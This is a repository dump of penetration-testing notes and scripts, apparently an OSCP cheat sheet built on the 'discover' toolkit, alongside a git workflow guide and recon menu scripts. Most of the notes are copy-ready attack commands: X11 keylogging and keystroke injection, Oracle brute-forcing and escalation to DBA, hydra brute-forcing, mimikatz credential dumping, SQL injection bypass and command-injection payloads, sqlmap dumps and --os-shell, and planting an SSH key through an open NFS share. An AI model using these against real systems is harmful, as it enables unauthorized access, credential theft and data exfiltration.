 20 | Always try to avoid working on the master branch. It usually results in merge conflicts and/or update issues. Instead, work on a bug/feature/topic branch whenever possible.
 21 | 
 22 |    #start from the master branch
 23 |    git checkout master
 24 | 
 25 |    #create a new branch
 26 |    git branch dev/kraman/bug/12345
 27 | 
 28 |    #switch to the new branch
 29 |    git checkout dev/kraman/bug/12345
 30 | 
 31 |    #...make changes...
 32 | 
 33 | Staying updated
 34 | 
 35 | Once a fork has been created, it does not automatically track the upstream repository. Follow the steps outlined below to keep the master branch up-to-date.
 36 | 
 37 |    #pull the latest changes from upstream
 38 |    git fetch upstream
 39 |    git fetch upstream --tags
 40 | 
 41 |    #make sure there are no un-committed changes
 42 |    git stash
 43 | 
 44 |    #make sure we are working on the master branch
 45 |    git checkout master
 46 | 
 47 |    #merge the latest changes
 48 |    git merge upstream/master
 49 | 
 50 |    #push the updates changes to our GitHub fork
 51 |    git push origin master
 52 |    git push origin --tags
 53 | 
 54 |    #return to your bug/feature branch
 55 |    git checkout dev/kraman/bug/12345
 56 | 
 57 |    #rebase this branch onto latest code from master (expect conflicts)
 58 |    git rebase master
 59 | 
 60 |    #... resolve conflicts
 61 | 
 62 |    #push the rebased branch back to your fork
 63 |    git push origin dev/kraman/bug/12345 -f
 64 | 
 65 |    #Restore any un-committed changes
 66 |    git stash pop
 67 | 
 68 | NOTE: The git stash steps are optional. It is easier if you commit all changes before attempting a rebase.
 69 | 
 70 | 
 71 | Submitting a patch
 72 | 
 73 | Once your code is ready to be submitted, you will need to submit a pull request with your changes.
 74 | 
 75 |     Update your branch and make sure you are rebased off the latest upstream/master
 76 |     Squash your commits onto a single revision
 77 |     Submit a pull request on GitHub 
 78 | 
 79 | Squashing your changes into one revision
 80 | 
 81 | Before you can submit a request, rebase all your changes on to a single commit. This makes it easier to review and also makes reverting the code easier in case of any build breakages.
 82 | 
 83 |    git rebase -i master
 84 |    #... squash commits ...
 85 | 
 86 | # Deleting local and remote branches
 87 | 
 88 | 	#local
 89 | 	git branch -D <branchname>
 90 | 
 91 | 	#remote
 92 | 	git push origin --delete <branchname>
 93 | 
 94 | # Creating a branch and checkout at the same time
 95 | 
 96 |     To create a branch and switch to it at the same time, you can run the git checkout command with the -b switch:
 97 | 
 98 |      git checkout -b iss53
 99 |     Switched to a new branch 'iss53'
100 | 
101 | # Testing PR's locally
102 | 
103 |    https://help.github.com/articles/checking-out-pull-requests-locally
104 |    fetch = +refs/pull/*/head:refs/pull/origin/*
105 | 
106 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/main.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo "Welcome to Hack3rcon5."
 7 | echo "This is my master script."
 8 | echo
 9 | echo
10 | echo "1. Recon domain"
11 | echo "2. Recon people"
12 | echo "3. Open a list of URLs in Firefox"
13 | echo "4. Open a domain's robot.txt in Firefox"
14 | echo "5. Nmap"
15 | echo
16 | echo -n "Choice: "
17 | read choice
18 | 
19 | echo $choice
20 | 
21 | case $choice in
22 |      1) ./recon-domain.sh ;;
23 |      2) ./recon-people.sh ;;
24 |      3) ./open-list.sh ;;
25 |      4) ./robots.sh ;;
26 |      5) ./nmap.sh ;;
27 |      *) echo; echo "Invalid choice."; echo
28 | esac
29 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/nmap.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo "1. CIDR, IP or URL"
 7 | echo "2. List"
 8 | echo "3. Previous menu"
 9 | echo
10 | echo -n "Choice: "
11 | read choice
12 | 
13 | case $choice in
14 |      1)
15 |      echo
16 |      echo -n "Enter a CIDR, IP or URL: "
17 |      read target
18 | 
19 |      # Check for no response
20 |      if [ -z $target ]; then
21 |           echo
22 |           echo "You did not enter anything."
23 |           exit
24 |      fi
25 | 
26 |      nmap -Pn -n -T4 --open -sV --stats-every 10s $target -oN scan.txt
27 |      ;;
28 | 
29 |      2)
30 |      echo
31 |      echo -n "Enter the location of your list: "
32 |      read location
33 | 
34 |      # Check for no response
35 |      if [ -z $location ]; then
36 |           echo
37 |           echo "You did not enter a location."
38 |           exit
39 |      fi
40 | 
41 |      # Check for wrong location
42 |      if [ ! -f $location ]; then
43 |           echo
44 |           echo "The file does not exist."
45 |           exit
46 |      fi
47 | 
48 |      nmap -Pn -n -T4 --open -sV --stats-every 10s -iL $location -oN scan.txt
49 |      ;;
50 | 
51 |      3) ./main.sh ;;
52 | 
53 |      *) echo; echo "Invalid choice."; echo
54 | esac
55 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/open-list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "Enter location of list: "
 7 | read location
 8 | 
 9 | # Check for no response
10 | if [ -z $location ]; then
11 |      echo
12 |      echo "You did not enter a location."
13 |      exit
14 | fi
15 | 
16 | # Check for wrong location
17 | if [ ! -f $location ]; then
18 |      echo 
19 |      echo "The file does not exist."
20 |      exit
21 | fi
22 | 
23 | firefox &
24 | sleep 4
25 | 
26 | # Read a list and open each line in a new tab
27 | for i in $(cat $location); do
28 |      firefox -new-tab $i &
29 |      sleep 1
30 | done
31 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/recon-domain.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "Enter a domain: "
 7 | read domain
 8 | 
 9 | # Check for no response
10 | if [ -z $domain ]; then
11 |      echo
12 |      echo "You did not enter a domain."
13 |      exit
14 | fi
15 | 
16 | echo
17 | echo "Starting recon on $domain."
18 | echo
19 | read -p "Press <enter> to continue."
20 | 
21 | firefox &
22 | sleep 4
23 | firefox -new-tab http://www.intodns.com/$domain &
24 | sleep 1
25 | firefox -new-tab http://mxtoolbox.com/SuperTool.aspx?action=dns%3a$domain&run=toolpage &
26 | sleep 1
27 | firefox -new-tab http://viewdns.info/dnsreport/?domain=$domain &
28 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/recon-people.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "First name: "
 7 | read fname
 8 | 
 9 | # Check for no response
10 | if [ -z $fname ]; then
11 |      echo
12 |      echo "You did not enter a first name."
13 |      exit
14 | fi
15 | 
16 | echo
17 | echo -n "Last name: "
18 | read lname
19 | 
20 | # Check for no response
21 | if [ -z $lname ]; then
22 |      echo
23 |      echo "You did not enter a last name."
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "Starting recon on $fname $lname."
29 | echo
30 | read -p "Press <enter> to continue."
31 | 
32 | firefox &
33 | sleep 4
34 | firefox -new-tab http://www.411.com/name/$fname-$lname/ &
35 | sleep 1
36 | firefox -new-tab http://www.cvgadget.com/person/$fname/$lname &
37 | sleep 1
38 | firefox -new-tab https://pipl.com/search/?q=$fname+$lname &
39 | sleep 1
40 | firefox -new-tab http://www.zabasearch.com/people/$fname+$lname/ &
41 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/hack3rcon/robots.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | rm robots.txt tmp 2>/dev/null
 5 | 
 6 | echo
 7 | echo
 8 | echo -n "Enter a domain: "
 9 | read domain
10 | 
11 | # Check for no response
12 | if [ -z $domain ]; then
13 |      echo
14 |      echo "You did not enter a domain."
15 |      exit
16 | fi
17 | 
18 | wget -q $domain/robots.txt
19 | 
20 | # awk example
21 | cat robots.txt | grep 'Disallow' | awk '{print $2}' > tmp
22 | 
23 | # cut example
24 | #cat robots.txt | grep 'Disallow' | cut -d ' ' -f2 > tmp
25 | 
26 | firefox &
27 | sleep 4
28 | 
29 | # Read a list and open each line in a new tab
30 | for i in $(cat tmp); do
31 |      firefox -new-tab http://www.$domain$i &
32 |      sleep1
33 | done
34 | 
35 | rm robots.txt tmp
36 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/insecure-protocols.txt:
--------------------------------------------------------------------------------
 1 | Insecure Protocols
 2 | 
 3 | 
 4 | # FTP access with admin/null credentials
 5 | 
 6 | ftp admin@<target IP>
 7 | user
 8 | admin
 9 | pwd
10 | 
11 | telnet <target IP> 21
12 | user admin
13 | pass
14 | id;
15 | ------------------------------------------------------------------------------------------------------
16 | 
17 | # FTP on non-standard port
18 | 
19 | ftp <target IP> <port>
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # FTP server does not support AUTH command
23 | 
24 | telnet <target IP> 21
25 | AUTH test
26 | ------------------------------------------------------------------------------------------------------
27 | 
28 | # Rservices
29 | 
30 | 513/tcp
31 | apt-get install rsh-client
32 | rlogin -l root <target IP>
33 | ------------------------------------------------------------------------------------------------------
34 | 
35 | # SSH Protocol v1
36 | 
37 | nmap -Pn -n -T4 -p22 --script=sshv1 <target IP>
38 | 
39 | ssh -1 <target IP>
40 | ------------------------------------------------------------------------------------------------------
41 | 
42 | # X11
43 | 
44 | nmap -Pn -n -T4 -p6000-6010 --script=x11-access <target IP>
45 | 
46 | xspy <target IP>
47 | 
48 | OS X
49 |      Screenshot:
50 |      xwd -display <targetIP>:<display> -root -out file.xwd
51 | 
52 |      View screenshot:
53 |      xwud -in file.xwd
54 | 
55 |      Key logging:
56 |      xkey <targetIP>:0.0 
57 | 
58 |      xdotool inject:
59 |      Open another Terminal and type:
60 | 
61 |      export DISPLAY=<ipaddress>:0
62 | 
63 |      $ xdotool key x t e r m
64 |      $ xdotool key KP_Enter
65 | 
66 |      Might need to inject 1 char at a time:
67 | 
68 |      xdotool key x 
69 |      xdotool key t
70 |      xdotool key e
71 |      xdotool key r 
72 |      xdotool key m
73 | 
74 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/maltego.txt:
--------------------------------------------------------------------------------
 1 | Maltego
 2 | 
 3 | 
 4 | Use the scroll wheel to zoom in and out.
 5 | Hold down the right mouse button to move around.
 6 | ------------------------------------------------------------------------------------------------------
 7 | 
 8 | # Example 1
 9 | 
10 | Select Domain from the Entities palette on the left and drag the icon to the right.
11 | Edit the domain to your target.
12 | Right click > Run Transform > ...
13 | Email addresses from Domain > All
14 | 
15 | DNS from Domain > All
16 | ctrl + down to select servers > Resolve to IP > All
17 | ctrl + down to select IPs > DNS from IP > All
18 | ctrl + down to select servers > Convert to Domain > All
19 | ctrl + down to select domains > Email addresses from Domain > All
20 | Select all emails > Other transforms > To Person, emailToMyspaceAccount, emailToFlickerAccount
21 | ------------------------------------------------------------------------------------------------------
22 | 
23 | # Example 2
24 | 
25 | Select IPv4 Address from the Entities palette on the left and drag the icon to the right.
26 | Edit the IP address to your target.
27 | Right click > Run Transform > ...
28 | DNS from IP > All in this set
29 | ------------------------------------------------------------------------------------------------------
30 | 
31 | Add a Domain > edit name to your target (www.target.com)
32 | 
33 | # Example 3
34 | 
35 | Right click (RC) > Run Transform > All Transforms > To Domain [Find other TLDs]
36 | Select all TLDs > Run Transform > All Transforms > To Website [Quick lookup]
37 | 
38 | Select all websites > Run Transform > All Transforms > To IP Address [DNS]
39 | ------------------------------------------------------------------------------------------------------
40 | 
41 | # Example 4
42 | 
43 | RC > Run Transform > DNS from Domain > All in this set
44 | Select all  > Run Transform > All Transforms > To IP Address [DNS]
45 | Select all  IP addresses > Run Transform > All Transforms > To Netblock [Using whois info]
46 | 
47 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/metasploit/Analysis of MSF Relative to PTES.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/ENUMERATION/discover-master/notes/metasploit/Analysis of MSF Relative to PTES.pdf


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/mobile.txt:
--------------------------------------------------------------------------------
 1 | Mobile App Testing for iOS
 2 | 
 3 | 
 4 | iOS 7.1.1
 5 | Pangu Jailbreak 1.2.0
 6 | http://cydiainstaller.net/download/install-cydia-ios-7-1-to-7-1-2/
 7 | 
 8 | Cydia
 9 | Run updates.
10 | Install
11 |   OpenSSH
12 |   iFile
13 |   Apple File Conduit 2
14 | 
15 | ssh root@<targetIP>
16 | password: alpine
17 | 
18 | iExplorer $35
19 | www.macroplant.com/iexplorer
20 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/oracle.txt:
--------------------------------------------------------------------------------
 1 | Oracle
 2 | 
 3 | 
 4 | 1. Locate a system running Oracle.
 5 | 2. Determine Oracle version.
 6 | 3. Determine Oracle SID.
 7 | 4. Guess/Bruteforce USERNAME/PASS.
 8 | 5. Privilege escalation via SQL injection.
 9 | 6. Manipulate data/post exploitation.
10 | 7. Cover tracks.
11 | ------------------------------------------------------------------------------------------------------
12 | 
13 | 1. nmap -Pn -n -T4 --open -p1521 <target IP>
14 | 
15 | 2. Example 1
16 |      msf > use auxiliary/scanner/oracle/tnslsnr_version
17 |      db_notes
18 |      
19 |    Example 2
20 |      tnscmd10g version -h <target IP>
21 |      tnscmd10g status -h <target IP>
22 |      Look for the version, LOGFILE, TRACING and PORT.
23 |    
24 | 3. Example 1
25 |      msf > use auxiliary/scanner/oracle/sid_enum
26 |      msf > use auxiliary/admin/oracle/sid_brute
27 |      
28 |    Example 2  
29 |      sidguess -i <target IP> -d /usr/share/metasploit-framework/data/wordlists/sid.txt
30 | 
31 |    Example 3
32 |      http://<target IP>:8080/oradb/PUBLIC/GLOBAL_NAME
33 | 
34 | 4. Example 1
35 |      msf > use auxiliary/admin/oracle/login_brute
36 |      set SID <sid>
37 |      
38 |    Example 2 
39 |      sqlplus <username>/<password>@<target IP>:<port>/<SID>
40 | 
41 | 5. msf > use auxiliary/admin/oracle/sql
42 |    set DBUSER <user>
43 |    set DBPASS <password>
44 |    set SID <sid>
45 |    set SQL select * from user_role_privs
46 |    
47 |    msf > use auxiliary/admin/oracle/pushin/lt_findricset_cursor
48 |    set DBUSER <user>
49 |    set DBPASS <password>
50 |    set SID <sid>
51 |    set SQL GRANT DBA TO <user>
52 |    set SQL GRANT JAVASYSPRIV TO <user>
53 |    
54 | 6. select * from v$version;                  -- Oracle version
55 |    select * from dba_registry_history;       -- Oracle patch level
56 |    select * from all_users;                  -- usernames
57 |    select owner,table_name from all_tables;  -- tables
58 |    select * from session_roles;              -- session roles
59 |    desc utl_http                             -- describes database objects
60 | 
61 | 
62 | http://www.youtube.com/watch?v=SVvAvmjT7V4#t=1535
63 | 
64 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/passwords.txt:
--------------------------------------------------------------------------------
 1 | Passwords
 2 | 
 3 | 
 4 | # Cracking
 5 | john -w=/usr/share/wordlists/rockyou.txt --format=<format> <hashes>
 6 | 
 7 | hashcat -m 5600 -a 1 <hashes>  -r /usr/share/hashcat/rules/combinator.rule
 8 | 
 9 | hydra -L <username list> -P <password list> -M <target list> <protocol>
10 | hydra -l <username> -p <password> <target> <protocol>
11 | hydra -l root -P /usr/share/wordlists/rockyou.txt -M 3389.txt rdp
12 | 
13 | hydra -l administrator -p admin -M /root/Desktop/target.txt http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
14 | hydra -l administrator -p admin 10.0.0.10 http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
15 | ------------------------------------------------------------------------------------------------------
16 | 
17 | # Dump Hashes
18 | 
19 | fgdump, pwdump6, pwdump7, smbexec, wce
20 | 
21 | mimikatz
22 | meterpreter > upload /usr/share/mimikatz/Win32/mimikatz.exe .
23 | meterpreter > upload /usr/share/mimikatz/Win32/mimikatz.sys .
24 | meterpreter > upload /usr/share/mimikatz/Win32/sekurlsa.dll .
25 | meterpreter > shell
26 | mimikatz.exe
27 | priviledge::debug
28 | sekurlsa::logonpasswords
29 | ------------------------------------------------------------------------------------------------------
30 | 
31 | # Sniffing
32 | 
33 | responder -i <IP> -wrf
34 | ------------------------------------------------------------------------------------------------------
35 | 
36 | # Windows Credential Editor (WCE)
37 | 
38 | How do I change my current NTLM credentials?
39 | wce.exe -s <username>:<domain>:<lmhash>:<nthash>
40 | 
41 | How do I create a new logon session and launch a program with new NTLM credentials?
42 | wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
43 | 
44 | How can I generate NTLM hashes with WCE? (for testing purposes)
45 | wce.exe -g <cleartext password>
46 | 
47 | How can I write hashes obtained by WCE to a file?
48 | wce.exe -o hashes.txt
49 | 
50 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/smtp.txt:
--------------------------------------------------------------------------------
 1 | SMTP
 2 | 
 3 | 
 4 | # SMTP relay, EXPN/VRFY command enabled
 5 | 
 6 | telnet <target IP> 25
 7 | helo root
 8 | mail from: root@target.com
 9 | rcpt to: jsmith@gmail.com
10 | DATA
11 | Subject: Testing open mail relay.
12 | Testing SMTP open mail relay. Have a nice day.
13 | .
14 | quit
15 | 
16 | for x in $(cat users.txt); do echo VRFY $x | nc -nv -w 1 <target IP> 25 2>/dev/null | grep ^’250’; done
17 | ------------------------------------------------------------------------------------------------------
18 | 
19 | sendEmail -f root@target.com -t jsmith@gmail.com -u Testing open mail relay. -m Testing SMTP open mail relay. Have a nice day. -s <target IP>
20 | 
21 | SMTP Service STARTTLS Plaintext Command Injection
22 | 
23 | telnet <target IP> 25
24 | S: <waits for connection on TCP port 25>
25 | C: <opens connection>
26 | S: 220 mail.target.com SMTP service ready
27 | C: EHLO mail.ietf.org
28 | S: 250-mail.target.com offers a warm hug of welcome
29 | S: 250 STARTTLS
30 | C: STARTTLS
31 | S: 220 Go ahead
32 | ------------------------------------------------------------------------------------------------------
33 | 
34 | # Internal IPs
35 | 
36 | When viewing test email, view the full headers and look for internal IPs and host names.
37 | ------------------------------------------------------------------------------------------------------
38 | 
39 | STARTTLS\r\nRSET\r\n
40 | 
41 | And the server sent the following two responses:
42 | 220 Server ready Ready to start TLS
43 | 250 +OK Reset
44 | ------------------------------------------------------------------------------------------------------
45 | 
46 | HELO <anything>
47 | Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
48 | Unknown domain - mail from: <user@unknown_domain>
49 | Domain not present - mail from: <user@localhost>
50 | Domain not supplied - mail from: <user>
51 | Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
52 | Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
53 | Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
54 | User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
55 | Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
56 | Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
57 | ------------------------------------------------------------------------------------------------------
58 | 
59 | #!/bin/bash
60 | clear
61 | 
62 | echo "SMTP open mail relay checker."
63 | 
64 | if [[ $1 == "" ]]; then
65 |      echo "ERROR - Specify host."
66 | else
67 |      if [[ $2 == "" ]]; then
68 |           PORT=25
69 |      else
70 |           PORT=$2
71 |      fi
72 | 
73 |      cat >> tmp << EOF
74 |      mail from: root@target.com
75 |      rcpt to: jsmith@gmail.com
76 |      data
77 |      Subject: Testing open mail relay.
78 |      Testing SMTP open mail relay from $1. 
79 |      Have a nice day.
80 |      .
81 |      quit
82 |      EOF
83 | 
84 |      echo "[*] Using target $1:$PORT"
85 |      cat tmp | nc $1 $PORT 
86 |      rm tmp
87 | fi
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/snmp.txt:
--------------------------------------------------------------------------------
 1 | SNMP
 2 | 
 3 | 
 4 | # Default or Guessable SNMP Community Strings
 5 | 
 6 | onesixtyone -c <password list> -i <target list>
 7 | 
 8 | snmpcheck -t <target IP> <private/public>
 9 | ------------------------------------------------------------------------------------------------------
10 | 
11 | # Read-only Community String of 'public'
12 | 
13 | snmpwalk -c public -v1 <target IP>                            # Enumerating MIB tree
14 |                                                               # MS Windows parameters
15 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.1.6.0       # System processes
16 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.4.2.1.2     # Running processes
17 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.4.2.1.4     # Processes path
18 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.2.3.1.4     # Storage units
19 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.6.3.1.2     # Software name
20 | snmpwalk -c public -v1 <target IP> 1.3.6.1.4.1.77.1.2.25      # User accounts
21 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.6.13.1.3       # TCP local port
22 | 
23 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/sqli.txt:
--------------------------------------------------------------------------------
 1 | SQL Injection
 2 | 
 3 | 
 4 | Check for SQLi by adding and single quote or the following: ‘ or 1=1--<space>
 5 | 
 6 | http://www.target.com/index.php?val=100’ 
 7 | http://www.target.com/index.php?val=100’ or ‘1’=’1 
 8 | 
 9 | Username: ' or 1=1--<space>
10 | Password:
11 | 
12 | Try to login as a specific user.
13 | Username: bob
14 | Password: ' or (1=1 and username = 'bob')--<space>
15 | 
16 | Database version
17 | Username: +convert(varchar,convert(int,@@version))+
18 | ------------------------------------------------------------------------------------------------------
19 | 
20 | # Google Dorks
21 | 
22 | inurl:index.php?id=
23 | inurl:gallery.php?id=
24 | inurl:article.php?id=
25 | inurl:pageid=
26 | ------------------------------------------------------------------------------------------------------
27 | 
28 | SQL databases interpret the single quote character as the boundary between code and data. It assumes that 
29 | anything following a single quote is code that it needs to run and anything encapsulated by a quote is data.
30 | 
31 | Example: SELECT * FROM products WHERE price < '100' ORDER BY description;
32 | 
33 | ' and 1=0/@@version;--
34 | ' and 1=0/user;--
35 | ' having 1'='1
36 | ' GROUPED BY productid having '1'='1
37 | ' GROUPED BY productid,name having '1'='1
38 | ------------------------------------------------------------------------------------------------------
39 | 
40 | MS-SQL server concatenates numbers, it does not add them. '10' + '0' would equal 100 not 10.
41 |  
42 | SELECT * FROM table1 WHERE condition1
43 | union all
44 | 
45 | SELECT * FROM table2 WHERE condition2
46 | 
47 | OS - @@version
48 |   Server instances - @@servername
49 |     Databases
50 |       Tables
51 |         Columns
52 | 
53 | SELECT name FROM master..sysdatabases
54 | ------------------------------------------------------------------------------------------------------
55 | 
56 | http://target.com/bookservice/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))—
57 | http://target.com/article.aspx?article_id=0+UNION+SELECT+EMAIL,+USERID,+PASSWORD+FROM+USERS
58 | Newsletter signup > Subscribe:  joe@gmail.com & ipconfig > C:\inetpub\wwwroot\Book\test.txt
59 | ------------------------------------------------------------------------------------------------------
60 | 
61 | Use Burp to trap a request. Copy the request to /root/tmp.
62 | 
63 | sqlmap -r /root/tmp
64 | sqlmap -r /root/tmp -p <parameter> --current-user        Show the user the web server is using to talk to the db
65 | sqlmap -r /root/tmp -p <parameter> -U <user> --passwords
66 | sqlmap -r /root/tmp --dbs                                Search for all dbs
67 | sqlmap -r /root/tmp -D <database> --tables               Show all tables in db
68 | sqlmap -r /root/tmp -D <database> -T <table> --dump      Show all data in table
69 | ------------------------------------------------------------------------------------------------------
70 | 
71 | From: http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/
72 | 
73 | sqlmap.py --url=”http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
74 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"
75 | 
76 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
77 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
78 | 
79 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
80 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa --tables
81 | 
82 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
83 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users --columns
84 | 
85 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
86 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users 
87 | -C user_id,user,password --dump
88 | 
89 | sqlmap.py --url="http://target.com/login.asp" --data="txtLoginID=shrikant&txtPassword=password&cmdSubmit=Login" 
90 | --os-shell
91 | ------------------------------------------------------------------------------------------------------
92 | 
93 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/ssl.txt:
--------------------------------------------------------------------------------
 1 | SSL
 2 | 
 3 |  
 4 | Redirect
 5 | Examine the response of a 301 message or Javascript.
 6 | curl -vvvv http://target.com
 7 | ------------------------------------------------------------------------------------------------------
 8 | 
 9 | Renegotiating (NULL-SHA or NULL-MD5)
10 | 
11 | sslscan --no-failed <target IP>
12 | 
13 | sslscan --targets=443.txt --no-failed
14 | 
15 | openssl s_client -connect target:443
16 | 
17 | telnet <target IP> 443
18 | GET / HTTP/1.0
19 | R
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | paste 443.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\$
23 | 
24 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/notes/unix.txt:
--------------------------------------------------------------------------------
 1 | Unix
 2 | 
 3 | 
 4 | # NFS Shares Anonymous Mountable
 5 | 
 6 | showmount -e <target IP>
 7 | 
 8 | mkdir /tmp/mount
 9 | mount -t nfs -o nolock <target IP>:/share /tmp/mount/
10 | cat /root/.ssh/id_rsa.pub >> /tmp/mount/root/.ssh/authorized_keys
11 | umount /tmp/mount
12 | ssh root@<target IP>
13 | ------------------------------------------------------------------------------------------------------
14 | 
15 | # Rstatd enabled
16 | 
17 | rsysinfo <target IP>
18 | ------------------------------------------------------------------------------------------------------
19 | 
20 | # Samba with a writeable file share
21 | 
22 | smbclient -L //<target IP>
23 | 
24 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/parsers/utfdictcsv.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #
 3 | # by John Kim
 4 | # Thanks to Securicon, LLC. for sponsoring development
 5 | #
 6 | #-*- coding:utf-8 -*-
 7 | 
 8 | import codecs
 9 | import cStringIO
10 | import csv
11 | 
12 | ################################################################
13 | 
14 | class DictUnicodeWriter(object):
15 | 
16 |     def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8", **kwds):
17 |         # Redirect output to a queue
18 |         self.queue = cStringIO.StringIO()
19 |         self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect, **kwds)
20 |         self.stream = f
21 |         self.encoder = codecs.getincrementalencoder(encoding)()
22 | 
23 |     def writerow(self, D):
24 |         self.writer.writerow({k:v.encode("utf-8") for k, v in D.items() if v})
25 |         # Fetch UTF-8 output from the queue ...
26 |         data = self.queue.getvalue()
27 |         data = data.decode("utf-8")
28 |         # ... and re-encode it into the target encoding
29 |         data = self.encoder.encode(data)
30 |         # Write to the target stream
31 |         self.stream.write(data)
32 |         # Empty queue
33 |         self.queue.truncate(0)
34 | 
35 |     def writerows(self, rows):
36 |         for D in rows:
37 |             self.writerow(D)
38 | 
39 |     def writeheader(self):
40 |         self.writer.writeheader()
41 | 
42 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/css/ie.css:
--------------------------------------------------------------------------------
 1 | #wrapper, #wrap-header, #main, #main-fullwidth, #wrap-footer, .clearfix { 
 2 | 	display:inline-block; 
 3 | }
 4 | 
 5 | * html #wrapper, * html #wrap-header, * html #main, * html #main-fullwidth, * html #wrap-footer, * html .clearfix{ height:1%; }
 6 | 
 7 | hr  { margin:-8px auto 11px; }
 8 | 
 9 | html>body p code { *white-space: normal; }
10 | 
11 | img { -ms-interpolation-mode:bicubic; }


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/active-recon.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/doc.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/emails.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/hosts.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/loadbalancing.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/names.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/passive-recon.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/pdf.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/data/ppt.htm:
